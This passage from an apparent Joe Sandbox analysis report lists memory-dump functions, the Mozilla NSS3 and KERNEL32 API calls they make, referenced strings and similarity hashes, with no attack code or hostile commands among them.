b.^l, xrefs: 6C5C8E96, 6C5C8F25

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
String ID: b.^l
API String ID: 1978757487-3800356567
Opcode ID: 9a95a10021858beb7a29ebcc3a7da6b28868ad895be4786587487588d45ff02b
Instruction ID: f6b3e0eadb246d376cf59379fa76b991b99eba9b381cd741ee7af07c6b781993
Opcode Fuzzy Hash: 9a95a10021858beb7a29ebcc3a7da6b28868ad895be4786587487588d45ff02b
Instruction Fuzzy Hash: FA217C70A09605AFD700AF69D8841A9BBF4FF88318F05456EE8989BB41DB30E854CBD7

Function 6C633E20 Relevance: 10.6, APIs: 7, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 6C635B40: PR_GetIdentitiesLayer.NSS3 ref: 6C635B56

PR_EnterMonitor.NSS3(?), ref: 6C633E45

Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C6690AB
Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C6690C9
Part of subcall function 6C669090: EnterCriticalSection.KERNEL32 ref: 6C6690E5
Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C669116
Part of subcall function 6C669090: LeaveCriticalSection.KERNEL32 ref: 6C66913F

PR_EnterMonitor.NSS3(?), ref: 6C633E5C
PR_EnterMonitor.NSS3(?), ref: 6C633E73
PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6C633EA6

Part of subcall function 6C64C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C64C2BF

PR_ExitMonitor.NSS3(?), ref: 6C633EC0
PR_ExitMonitor.NSS3(?), ref: 6C633ED7
PR_ExitMonitor.NSS3(?), ref: 6C633EEE

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Monitor$EnterValue$Exit$CriticalSection$ErrorIdentitiesLayerLeave
String ID:
API String ID: 2517541793-0
Opcode ID: 54027f88e9f8c7aef8774f630c25a29e5d64c5ae93700a839b1c12e084a23d9d
Instruction ID: 32475491639bfc939031d547b3f4e349e62c3b13f264545247cc09c204558d3d
Opcode Fuzzy Hash: 54027f88e9f8c7aef8774f630c25a29e5d64c5ae93700a839b1c12e084a23d9d
Instruction Fuzzy Hash: 6D119671514610ABD7315E29FC02AC777A1DB4130CF007835E95E86A60E636E52BC74F

Function 6C6B2C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C6B2CA0
PR_ExitMonitor.NSS3 ref: 6C6B2CBE
calloc.MOZGLUE(00000001,00000014), ref: 6C6B2CD1
strdup.MOZGLUE(?), ref: 6C6B2CE1
PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C6B2D27

Strings

Loaded library %s (static lib), xrefs: 6C6B2D22

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Monitor$EnterExitPrintcallocstrdup
String ID: Loaded library %s (static lib)
API String ID: 3511436785-2186981405
Opcode ID: 67da37fe3d7e7a4e302984ef1c3e2724d35df5484fa516cd1ce002481f5b2d99
Instruction ID: 0b0d76a80aa8138dc7359e2ba977523689faf8321dd05d0188425fc5a1789f84
Opcode Fuzzy Hash: 67da37fe3d7e7a4e302984ef1c3e2724d35df5484fa516cd1ce002481f5b2d99
Instruction Fuzzy Hash: 941190B17012409BEB108F15DC58A6677F5AB4A31DF14853DD80997B41DB31E828CBA9

Function 6C5ABDC0 Relevance: 10.6, APIs: 7, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C5ABDCA

Part of subcall function 6C600FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5A87ED,00000800,6C59EF74,00000000), ref: 6C601000
Part of subcall function 6C600FF0: PR_NewLock.NSS3(?,00000800,6C59EF74,00000000), ref: 6C601016
Part of subcall function 6C600FF0: PL_InitArenaPool.NSS3(00000000,security,6C5A87ED,00000008,?,00000800,6C59EF74,00000000), ref: 6C60102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C5ABDDB

Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C6010F3
Part of subcall function 6C6010C0: EnterCriticalSection.KERNEL32(?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60110C
Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601141
Part of subcall function 6C6010C0: PR_Unlock.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601182
Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C5ABDEC

Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60116E

SECITEM_CopyItem_Util.NSS3(00000000,00000000,?), ref: 6C5ABE03

Part of subcall function 6C5FFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C5F8D2D,?,00000000,?), ref: 6C5FFB85
Part of subcall function 6C5FFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C5FFBB1

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5ABE22
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5ABE30
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5ABE3B

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_$AllocateArena_ErrorValue$CopyCriticalEnterFreeInitItem_LockPoolSectionUnlockcallocmemcpy
String ID:
API String ID: 1821307800-0
Opcode ID: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
Instruction ID: 3c8a238479692aa1f90db47d941e4b9fc40545223719b91055fece700bcda0af
Opcode Fuzzy Hash: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
Instruction Fuzzy Hash: CE01DB75B4121576FA1036A77C01F6F76884F9228DF144130FF05AAB82FB51D51A82FE

Function 6C600FF0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5A87ED,00000800,6C59EF74,00000000), ref: 6C601000
PR_NewLock.NSS3(?,00000800,6C59EF74,00000000), ref: 6C601016

Part of subcall function 6C6698D0: calloc.MOZGLUE(00000001,00000084,6C590936,00000001,?,6C59102C), ref: 6C6698E5

PL_InitArenaPool.NSS3(00000000,security,6C5A87ED,00000008,?,00000800,6C59EF74,00000000), ref: 6C60102B
TlsGetValue.KERNEL32(00000000,?,?,6C5A87ED,00000800,6C59EF74,00000000), ref: 6C601044
free.MOZGLUE(00000000,?,00000800,6C59EF74,00000000), ref: 6C601064

Strings

security, xrefs: 6C601025

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: calloc$ArenaInitLockPoolValuefree
String ID: security
API String ID: 3379159031-3315324353
Opcode ID: 7edff069eb8fcdcaa8a28aadfde66f4744cb6e066ec7f07e8a262b78ea5ba639
Instruction ID: 1132bd20f12531d57b57eafa42acd51b995e7335b269c3509d7417549e1fbef8
Opcode Fuzzy Hash: 7edff069eb8fcdcaa8a28aadfde66f4744cb6e066ec7f07e8a262b78ea5ba639
Instruction Fuzzy Hash: 9E01AB70B0029097E7242F3D9D04B863668BF4374CF00052AE88AA7E51EF70C154CBDE

Function 6C631C60 Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C631C74

Part of subcall function 6C64C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C64C2BF

DeleteCriticalSection.KERNEL32(?), ref: 6C631C92
free.MOZGLUE(?), ref: 6C631C99
DeleteCriticalSection.KERNEL32(?), ref: 6C631CCB
free.MOZGLUE(?), ref: 6C631CD2

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalDeleteSectionfree$ErrorValue
String ID:
API String ID: 3805613680-0
Opcode ID: 26db20fdbf0945b6d9cece12ea6b7f9fb4d4a7f4b5983154c4fa51b7fd2c4f1b
Instruction ID: 1987e39a7b57e946276fbd5176842361b0e21a836e62cc6442e4ff36abce3f91
Opcode Fuzzy Hash: 26db20fdbf0945b6d9cece12ea6b7f9fb4d4a7f4b5983154c4fa51b7fd2c4f1b
Instruction Fuzzy Hash: A00192F2F052216FDF20AFA49C0DB8A37B8A747359F101139E90EA2B40DF65E119879D

Function 6C642E50 Relevance: 9.3, APIs: 6, Instructions: 251COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000), ref: 6C643046

Part of subcall function 6C62EE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C62EE85

PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6C617FFB), ref: 6C64312A
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C643154
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C642E8B

Part of subcall function 6C64C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C64C2BF

Part of subcall function 6C62F110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6C619BFF,?,00000000,00000000), ref: 6C62F134

memcpy.VCRUNTIME140(8B3C75C0,?,6C617FFA), ref: 6C642EA4
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C64317B

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Error$memcpy$K11_Value
String ID:
API String ID: 2334702667-0
Opcode ID: 6d6fe4c79933c29fb2208fe4aba7f136c613389222d8d5d280f975b21450667c
Instruction ID: c040a5174ddae18b069ae6dcc13d4897c21216b7038fdb32e0ee04e384cd90d8
Opcode Fuzzy Hash: 6d6fe4c79933c29fb2208fe4aba7f136c613389222d8d5d280f975b21450667c
Instruction Fuzzy Hash: C0A1AC71A002189FDB24CF54CC80BEAB7B5EF4A308F1481A9E949A7741E771AD85CFA5

Function 6C60ED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C60ED6B
PORT_Alloc_Util.NSS3(00000000), ref: 6C60EDCE

Part of subcall function 6C600BE0: malloc.MOZGLUE(6C5F8D2D,?,00000000,?), ref: 6C600BF8
Part of subcall function 6C600BE0: TlsGetValue.KERNEL32(6C5F8D2D,?,00000000,?), ref: 6C600C15

free.MOZGLUE(00000000,?,?,?,?,6C60B04F), ref: 6C60EE46
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C60EECA
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C60EEEA
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C60EEFB

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Alloc_Util$Arena$Valuefreemalloc
String ID:
API String ID: 3768380896-0
Opcode ID: e3f2993f40b0c781bdfef1bc12b6feff53ac7fc8f1584209342989ad4642bf64
Instruction ID: 06f67fd065ede9c8d51770c61b067f9a5c55f1350bad4ba9b043e94a414e01d6
Opcode Fuzzy Hash: e3f2993f40b0c781bdfef1bc12b6feff53ac7fc8f1584209342989ad4642bf64
Instruction Fuzzy Hash: 43818EB1B002099FEB18CF55DA84BAB77F5FF89308F144428E855A7751DB30E815CBA9

Function 6C60CCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C60C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C60DAE2,?), ref: 6C60C6C2

PR_Now.NSS3 ref: 6C60CD35

Part of subcall function 6C669DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C6B0A27), ref: 6C669DC6
Part of subcall function 6C669DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C6B0A27), ref: 6C669DD1
Part of subcall function 6C669DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C669DED

Part of subcall function 6C5F6C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C5A1C6F,00000000,00000004,?,?), ref: 6C5F6C3F

PR_GetCurrentThread.NSS3 ref: 6C60CD54

Part of subcall function 6C669BF0: TlsGetValue.KERNEL32(?,?,?,6C6B0A75), ref: 6C669C07

Part of subcall function 6C5F7260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C5A1CCC,00000000,00000000,?,?), ref: 6C5F729F

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C60CD9B
PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C60CE0B
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C60CE2C

Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C6010F3
Part of subcall function 6C6010C0: EnterCriticalSection.KERNEL32(?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60110C
Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601141
Part of subcall function 6C6010C0: PR_Unlock.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601182
Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60119C

PORT_ArenaMark_Util.NSS3(00000000), ref: 6C60CE40

Part of subcall function 6C6014C0: TlsGetValue.KERNEL32 ref: 6C6014E0
Part of subcall function 6C6014C0: EnterCriticalSection.KERNEL32 ref: 6C6014F5
Part of subcall function 6C6014C0: PR_Unlock.NSS3 ref: 6C60150D

Part of subcall function 6C60CEE0: PORT_ArenaMark_Util.NSS3(?,6C60CD93,?), ref: 6C60CEEE
Part of subcall function 6C60CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C60CD93,?), ref: 6C60CEFC
Part of subcall function 6C60CEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C60CD93,?), ref: 6C60CF0B
Part of subcall function 6C60CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C60CD93,?), ref: 6C60CF1D

Part of subcall function 6C60CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C60CD93,?), ref: 6C60CF47
Part of subcall function 6C60CEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C60CD93,?), ref: 6C60CF67
Part of subcall function 6C60CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C60CD93,?,?,?,?,?,?,?,?,?,?,?,6C60CD93,?), ref: 6C60CF78

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
String ID:
API String ID: 3748922049-0
Opcode ID: 530285ecdd5e3cf6c7ef38d07ffd18d173d52b8b95999fa4c8bb4c455bf0611c
Instruction ID: b4d6bd8282a73ad898f0c85a1ccb9c750883d562bd36f0efa8f6a6661f23360a
Opcode Fuzzy Hash: 530285ecdd5e3cf6c7ef38d07ffd18d173d52b8b95999fa4c8bb4c455bf0611c
Instruction Fuzzy Hash: 8551B576B00100ABE714DF69DD40B9A77F4EF48348F250524D956B7B50EB31ED06CBAA

Function 6C61FFD0 Relevance: 9.1, APIs: 6, Instructions: 132COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFD076,00000000), ref: 6C61FFE5

Part of subcall function 6C64C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C64C2BF

PR_EnterMonitor.NSS3(?), ref: 6C620004
PR_EnterMonitor.NSS3(?), ref: 6C62001B

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: EnterMonitor$ErrorValue
String ID:
API String ID: 3413098822-0
Opcode ID: 745f65faddce23283f2925797e37d35c2c1454f6149af7bb5ff4b8577be57c11
Instruction ID: 1de727de9668dedbe8a7bf57f7e6d1fc3feb30d95119d50bb7d1dc8f6c54c04f
Opcode Fuzzy Hash: 745f65faddce23283f2925797e37d35c2c1454f6149af7bb5ff4b8577be57c11
Instruction Fuzzy Hash: 464147752486808BE7204A69DCB97EB72A1DB4130DF10053DE45BCAEA0E7BDA549CF4E

Function 6C5DEEF0 Relevance: 9.1, APIs: 6, Instructions: 124threadCOMMON

Download Yara Rule

APIs

PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6C5DEF38

Part of subcall function 6C5C9520: PK11_IsLoggedIn.NSS3(00000000,?,6C5F379E,?,00000001,?), ref: 6C5C9542

PK11_Authenticate.NSS3(?,00000001,?), ref: 6C5DEF53

Part of subcall function 6C5E4C20: TlsGetValue.KERNEL32 ref: 6C5E4C4C
Part of subcall function 6C5E4C20: EnterCriticalSection.KERNEL32(?), ref: 6C5E4C60
Part of subcall function 6C5E4C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C5E4CA1
Part of subcall function 6C5E4C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C5E4CBE
Part of subcall function 6C5E4C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C5E4CD2
Part of subcall function 6C5E4C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5E4D3A

PR_GetCurrentThread.NSS3 ref: 6C5DEF9E

Part of subcall function 6C669BF0: TlsGetValue.KERNEL32(?,?,?,6C6B0A75), ref: 6C669C07

free.MOZGLUE(00000000), ref: 6C5DEFC3
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C5DF016
free.MOZGLUE(00000000), ref: 6C5DF022

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
String ID:
API String ID: 2459274275-0
Opcode ID: 96e99602cf0b33bb3cb0d64f869e5be2ecef360221664e58b336f89d5be15639
Instruction ID: 0cb3f2e0160e4a7ac191ab61283b633d12068b965d09c49cef207b2d2a25ef0c
Opcode Fuzzy Hash: 96e99602cf0b33bb3cb0d64f869e5be2ecef360221664e58b336f89d5be15639
Instruction Fuzzy Hash: EA41B371E0020AABDF018FA9DC85BEE7BB9AF48348F054025F915A7350E772D9158BA5

Function 6C5CCF40 Relevance: 9.1, APIs: 6, Instructions: 112memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000060), ref: 6C5CCF80
SECITEM_DupItem_Util.NSS3(?), ref: 6C5CD002
PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,?,00000000), ref: 6C5CD016
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5CD025
PR_NewLock.NSS3 ref: 6C5CD043
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C5CD074

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: ErrorUtil$Alloc_ContextDestroyItem_K11_Lock
String ID:
API String ID: 3361105336-0
Opcode ID: 5384328983dbd372d2e7bc177d4029337e81ae8ee7a9bf7b7e2dac66c09b8a63
Instruction ID: cdfbf399fe15dd82b572379c567bd655001cb4c1aaf71a70ade481559cbe65ff
